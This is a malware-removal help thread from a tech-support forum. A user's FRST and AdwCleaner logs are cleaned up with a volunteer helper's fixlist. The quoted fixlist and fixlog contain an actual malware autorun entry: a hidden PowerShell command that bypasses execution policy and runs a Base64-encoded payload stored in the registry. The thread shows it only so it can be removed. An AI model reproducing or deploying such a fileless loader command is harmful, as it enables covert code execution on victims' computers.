2015-11-12 12:21 - 2014-01-31 13:10 - 00000000 ____D C:\Users\user\AppData\Roaming\Media Player Classic
2015-11-12 12:21 - 2014-01-19 19:56 - 00000000 ____D C:\Users\user\AppData\Roaming\BitTorrent
2015-11-12 12:07 - 2012-10-22 09:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-12 12:07 - 2012-10-22 09:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-12 10:42 - 2014-01-18 01:33 - 00000000 ____D C:\Users\user\AppData\Roaming\vlc
2015-11-12 10:36 - 2015-01-25 12:55 - 00000000 ____D C:\ProgramData\GarenaMessenger
2015-11-12 10:35 - 2015-01-25 12:56 - 00000000 ____D C:\Users\user\AppData\Roaming\GarenaPlus
2015-11-12 10:24 - 2013-04-26 02:29 - 32016384 ___SH C:\Users\user\Desktop\Thumbs.db
2015-11-12 10:11 - 2015-09-20 07:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-11-12 01:13 - 2015-06-24 04:49 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-11-11 10:11 - 2012-10-22 10:06 - 00000000 ____D C:\ProgramData\Skype
2015-11-11 04:56 - 2009-07-14 13:13 - 00794490 _____ C:\Windows\system32\PerfStringBackup.INI
2015-11-10 10:47 - 2013-12-26 04:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garena
2015-11-09 22:01 - 2015-08-24 07:29 - 00000000 ____D C:\Users\user\AppData\Local\MalwareProtectionLive
2015-11-09 10:00 - 2013-12-12 21:06 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2015-11-09 09:59 - 2009-07-14 13:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-11-07 22:24 - 2015-03-28 09:45 - 00000000 ____D C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-11-07 22:24 - 2015-01-25 17:10 - 00000000 ____D C:\Users\user\AppData\Local\CrashDumps
2015-11-06 22:52 - 2015-08-27 02:42 - 00000000 ____D C:\Users\user\Desktop\DESKTOP FILES
2015-11-06 21:55 - 2015-04-11 22:09 - 00000000 ____D C:\lp2
2015-11-03 19:05 - 2014-03-27 14:21 - 00000000 ____D C:\Users\user\AppData\Local\Microsoft Games
2015-11-03 19:02 - 2015-10-06 12:45 - 00000000 ____D C:\Users\user\Desktop\The Sims 1 Setup(to install)
2015-11-02 14:46 - 2014-05-06 00:49 - 00006656 _____ C:\Users\user\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
==================== Files in the root of some directories =======
 
2013-06-15 21:40 - 2015-01-25 07:52 - 0424299 _____ () C:\Program Files (x86)\Yahoo Messenger.exe
2014-06-15 16:30 - 2014-06-15 16:30 - 0000000 _____ () C:\Users\user\AppData\Roaming\bitlord_log.txt
2015-02-11 00:14 - 2015-02-11 00:15 - 0161280 _____ () C:\Users\user\AppData\Roaming\LolChecker3L.exe
2014-03-25 15:15 - 2014-09-28 07:26 - 0045270 _____ () C:\Users\user\AppData\Roaming\room_v3.dat
2015-03-24 05:40 - 2015-03-24 05:40 - 0000095 _____ () C:\Users\user\AppData\Roaming\settings.xml
2014-04-25 04:27 - 2014-04-25 04:27 - 0000038 ___SH () C:\Users\user\AppData\Local\1754111884ee9ab5277ca00.95260103
2014-05-06 00:49 - 2015-11-02 14:46 - 0006656 _____ () C:\Users\user\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-06-15 20:44 - 2014-06-15 20:44 - 0000218 _____ () C:\Users\user\AppData\Local\recently-used.xbel
2015-01-25 10:10 - 2015-01-28 16:11 - 0007605 _____ () C:\Users\user\AppData\Local\resmon.resmoncfg
2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
 
Files to move or delete:
====================
C:\ProgramData\mscmcnfo.exe
 
 
Some files in TEMP:
====================
C:\Users\user\AppData\Local\Temp\04daeb573ce62afa7555cd2e25adad9a.dll
C:\Users\user\AppData\Local\Temp\8b2451c9a3b319e7acdadb60680c5536.dll
C:\Users\user\AppData\Local\Temp\ab493e4f04f5854a2b514ead2208eeaf.dll
C:\Users\user\AppData\Local\Temp\ab5e31d07b6ea746979d10d903f463d5.dll
C:\Users\user\AppData\Local\Temp\cdo1027532841.dll
C:\Users\user\AppData\Local\Temp\cdo1570732038.dll
C:\Users\user\AppData\Local\Temp\cdo1596866374.dll
C:\Users\user\AppData\Local\Temp\cdo1654477641.dll
C:\Users\user\AppData\Local\Temp\cdo1741655092.dll
C:\Users\user\AppData\Local\Temp\cdo1782642798.dll
C:\Users\user\AppData\Local\Temp\cdo1933995910.dll
C:\Users\user\AppData\Local\Temp\cdo2321098618.dll
C:\Users\user\AppData\Local\Temp\cdo2341346200.dll
C:\Users\user\AppData\Local\Temp\cdo2743754581.dll
C:\Users\user\AppData\Local\Temp\cdo27712066.dll
C:\Users\user\AppData\Local\Temp\cdo2935743010.dll
C:\Users\user\AppData\Local\Temp\cdo3059789971.dll
C:\Users\user\AppData\Local\Temp\cdo3104791633.dll
C:\Users\user\AppData\Local\Temp\cdo3332709131.dll
C:\Users\user\AppData\Local\Temp\cdo3557932323.dll
C:\Users\user\AppData\Local\Temp\cdo3694628903.dll
C:\Users\user\AppData\Local\Temp\cdo3833933485.dll
C:\Users\user\AppData\Local\Temp\cdo4014789421.dll
C:\Users\user\AppData\Local\Temp\cdo489187832.dll
C:\Users\user\AppData\Local\Temp\cdo699369333.dll
C:\Users\user\AppData\Local\Temp\PH_150602to150616.exe
C:\Users\user\AppData\Local\Temp\PH_150616to150630.exe
C:\Users\user\AppData\Local\Temp\PH_150630to150714.exe
C:\Users\user\AppData\Local\Temp\PH_150714to150724.exe
C:\Users\user\AppData\Local\Temp\PH_150724to150727.exe
C:\Users\user\AppData\Local\Temp\PH_150727to150729.exe
C:\Users\user\AppData\Local\Temp\PH_150729to150807.exe
C:\Users\user\AppData\Local\Temp\PH_150807to150825.exe
C:\Users\user\AppData\Local\Temp\PH_150825to150909.exe
C:\Users\user\AppData\Local\Temp\PH_150909to150917.exe
C:\Users\user\AppData\Local\Temp\PH_150917to150922.exe
C:\Users\user\AppData\Local\Temp\PH_150922to151006.exe
C:\Users\user\AppData\Local\Temp\PH_151103to151112.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-11-01 10:14
 
==================== End of FRST.txt ============================


BC AdBot (Login to Remove)

 


#2 Marnel

Marnel
  • Topic Starter

  • Members
  • 52 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:02:39 AM

Posted 14 November 2015 - 11:31 PM

Bump



#3 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:01:39 PM

Posted 15 November 2015 - 10:24 AM

hi,

 

A "slow" computer dosnt always mean virus or malware. Please download and run Adwcleaner and we will go from there. Usually only online once or twice per day so you may not get a reply from me until the following day.

 

Please download adwcleaner and save to your desktop.

    http://www.bleepingcomputer.com/download/adwcleaner/

    Right click AdwCleaner.exe and select "run as admin"
    Accept the disclaimer
    Click on the Scan button.
    Once the scan is done, Click the Clean button
    Press OK when asked to close all programs and follow the onscreen prompts.
    Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically
    Copy and paste the contents of that logfile in your next reply.
    A copy of that logfile will also be saved in the C:\AdwCleaner folder.

 

Next we will use FRSt. Please copy/paste whats below into notepad. Save it has fixlist.txt in the same location you have FRST. Start FRST like before except this time click on the Fix button once. Machine may reboot to finish. Upon reboot you will find a fixlog.txt in the same location as FRST. Please post the fixlog.txt in your reply.

2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
C:\ProgramData\mscmcnfo.exe
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
EmptyTemp:

How Can I Reduce My Risk to Malware?


#4 Marnel

Marnel
  • Topic Starter

  • Members
  • 52 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:02:39 AM

Posted 15 November 2015 - 07:39 PM

Hey, Thank you for replying.

 

AdwCleaner[S#]:

# AdwCleaner v5.021 - Logfile created 16/11/2015 at 08:28:48
# Updated 14/11/2015 by Xplode
# Database : 2015-11-13.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : user - BAUTISTA
# Running from : C:\Users\user\Desktop\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
Folder Found : C:\Program Files (x86)\GreenTree Applications
Folder Found : C:\ProgramData\ytd video downloader
Folder Found : C:\ProgramData\{c22796e6-2c6d-f246-c227-796e62c65b98}
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ytd video downloader
Folder Found : C:\users\user\AppData\Local\MalwareProtectionLive
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cekonfccladjgbdhpgobceahgjdcdbod
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hjnhcgkngeeahimbfhejeaiijecekhba
Folder Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jloeihbcjbkgigodmcacomgfihpiaiip
Folder Found : C:\users\user\AppData\Roaming\OpenCandy
Folder Found : C:\users\user\AppData\Roaming\Settings Manager
Folder Found : C:\users\user\AppData\Roaming\RHEng
Folder Found : C:\users\user\AppData\Roaming\BrowserExtensions
Folder Found : C:\users\user\AppData\Roaming\Update Manager
Folder Found : C:\users\user\AppData\Roaming\BitLord
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{2bc72c53-9bde-4db2-8479-eda9a5e71f4e}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{c2fc3c2b-a65a-453c-bf95-101fde56ed1d}
Folder Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\Extensions\{d3b9472c-f8b1-4a10-935b-1087bac8417f}
 
***** [ Files ] *****
 
File Found : C:\Users\Public\Desktop\YTD Video Downloader.lnk
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kbfnbcaeplbcioakkpcpgfkobkghlhen_0.localstorage
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kbfnbcaeplbcioakkpcpgfkobkghlhen_0.localstorage-journal
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cekonfccladjgbdhpgobceahgjdcdbod
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cekonfccladjgbdhpgobceahgjdcdbod
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjnhcgkngeeahimbfhejeaiijecekhba
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jloeihbcjbkgigodmcacomgfihpiaiip_0.localstorage
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_jloeihbcjbkgigodmcacomgfihpiaiip_0.localstorage-journal
File Found : C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jloeihbcjbkgigodmcacomgfihpiaiip
File Found : C:\users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Malware Protection Live.lnk
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\searchplugins\yahoo_ff.xml
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
File Found : C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\user.js
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Browser Extensions]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [MalwareProtectionLive]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [BackgroundHost.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD [BackgroundHost.exe]
Key Found : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Key Found : HKLM\SOFTWARE\Classes\AppID\{9C81D00A-3DAA-48AB-90C7-8252119ABB93}
Key Found : HKLM\SOFTWARE\Classes\AppID\{1DA17428-323D-48FF-857C-98CFEE48BFD5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3CCC052E-BDEE-408A-BEA7-90914EF2964B}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{61F47056-E400-43D3-AF1E-AB7DFFD4C4AD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E2B98EEA-EE55-4E9B-A8C1-6E5288DF785A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Key Found : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{50F60937-910A-4C05-8E36-FE4E299191CF}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5}
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\Linkey
Key Found : HKCU\Software\WEBAPP
Key Found : HKCU\Software\AppDataLow\Software\Settings Manager
Key Found : HKCU\Software\AppDataLow\Software\Browser Extensions
Key Found : HKLM\SOFTWARE\PositiveFinds
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{3A787631-66A2-4634-B928-A37E73B58FB6}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Settings Manager
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MalwareProtectionLive
Data Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ie
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{26314958-A633-434B-84F0-AFD107022F56}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{3E9AC06D-F60A-4990-AD1C-ACB860F40AE0}
Data Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {3E9AC06D-F60A-4990-AD1C-ACB860F40AE0}
 
***** [ Web browsers ] *****
 
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6jaxo2qg.default\prefs.js] [Preference] Found : user_pref("startpage.ntsearch_url", "hxxps://ph.search.yahoo.com/search?fr=spigot-nt-ff&ei=utf-8&ilc=12&type=715483&p={searchTerms}");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\il1dvo6n.default\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\prefs.js] [Preference] Found : user_pref("keyword.URL", "hxxps://ph.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=715483&p=");
[C:\users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wjavt8eh.default-1389747203138\prefs.js] [Preference] Found : user_pref("browser.startup.homepage", "hxxps://ph.search.yahoo.com/?type=715483&fr=spigot-yhp-ff");
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : cekonfccladjgbdhpgobceahgjdcdbod
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : cekonfccladjgbdhpgobceahgjdcdbod
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : fcfenmboojpjinhpgggodefccipikbpd
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : fpmeembnagmagppkgghhfjfdfajdfcah
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : hjnhcgkngeeahimbfhejeaiijecekhba
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : jloeihbcjbkgigodmcacomgfihpiaiip
[C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : kbfnbcaeplbcioakkpcpgfkobkghlhen
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [11971 bytes] ##########
 
 
 
fixlog.txt: 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:07-11-2015
Ran by user (2015-11-16 08:35:20) Run:1
Running from C:\Users\user\Desktop
Loaded Profiles: user (Available Profiles: user)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
2015-06-24 22:20 - 2015-06-24 22:20 - 0000000 _____ () C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679}
2013-03-08 16:34 - 2014-02-20 23:49 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2014-04-30 09:53 - 2010-11-20 20:17 - 72545408 ___SH () C:\ProgramData\mscmcnfo.exe
C:\ProgramData\mscmcnfo.exe
BHO: Browser Extensions -> {34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} -> C:\Users\user\AppData\Roaming\BrowserExtensions\Coupons64.dll [2015-06-09] ()
HKLM\...\Policies\Explorer\Run: [1024412975] => C:\ProgramData\mscmcnfo.exe [72545408 2010-11-20] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Browser Extensions] => C:\Users\user\AppData\Roaming\BrowserExtensions\BEHelper.exe [540656 2015-06-09] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [Settings Manager] => C:\Users\user\AppData\Roaming\Settings Manager\SettingsManager.EXE [969840 2015-11-03] ()
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [{33D7074C-563D-4D69-875F-595D51FBE7FC}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AhgetfWU').QlGpriXvmdmWTi)));
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\...\Run: [UM] => C:\Users\user\AppData\Roaming\Update Manager\UM.EXE [806064 2015-11-10] ()
EmptyTemp:
*****************
 
C:\Users\user\AppData\Local\{0FB02795-135A-4FDE-B93F-90D379995679} => moved successfully
C:\ProgramData\ezsidmv.dat => moved successfully
Could not move "C:\ProgramData\mscmcnfo.exe" => Scheduled to move on reboot.
Could not move "C:\ProgramData\mscmcnfo.exe" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} => key not found. 
HKCR\CLSID\{34A0D84B-CDDC-4EC4-AFDD-4F1DDE1D14E5} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\1024412975 => value not found.
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Browser Extensions => value not found.
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Settings Manager => value removed successfully
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{33D7074C-563D-4D69-875F-595D51FBE7FC} => value removed successfully
HKU\S-1-5-21-2520790421-254736193-3744350732-1000\Software\Microsoft\Windows\CurrentVersion\Run\\UM => value removed successfully
EmptyTemp: => 399.2 MB temporary data Removed.
 
Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 2015-11-16 08:36:56)
 
C:\ProgramData\mscmcnfo.exe => Is moved successfully
C:\ProgramData\mscmcnfo.exe => Is moved successfully
 
==== End of Fixlog 08:36:56 ====

Edited by Marnel, 15 November 2015 - 07:40 PM.


#5 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:01:39 PM

Posted 15 November 2015 - 07:47 PM

ok. good. Rerun Adwcleaner like you did before and after the scan is done click the cleaning button. Machine will reboot to finish the removal process.


How Can I Reduce My Risk to Malware?


#6 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:01:39 PM

Posted 17 November 2015 - 05:48 PM

You have it all under control?


How Can I Reduce My Risk to Malware?


#7 Marnel

Marnel
  • Topic Starter

  • Members
  • 52 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:02:39 AM

Posted 17 November 2015 - 08:57 PM

There's so many processes running in my computer I don't know these processes but my RAM and CPU Usage spikes to 70-95%



#8 shelf life

shelf life

  • Malware Response Team
  • 2,688 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:@localhost
  • Local time:01:39 PM

Posted 18 November 2015 - 05:16 PM

ok so you ran adwcleaner again and after the scan clicked the cleaning button?

Rescan with FRST and post a new FRST log also.


How Can I Reduce My Risk to Malware?





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users